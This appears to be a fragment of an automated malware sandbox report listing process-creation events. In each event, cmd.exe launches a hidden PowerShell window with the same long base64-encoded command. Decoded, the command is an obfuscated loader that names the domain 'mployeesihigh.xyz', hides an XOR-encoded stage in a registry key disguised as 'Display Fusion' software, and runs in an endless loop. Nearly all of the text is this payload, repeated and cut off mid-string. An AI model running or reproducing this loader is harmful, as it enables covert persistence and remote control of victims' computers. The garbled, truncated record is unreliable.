GwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkA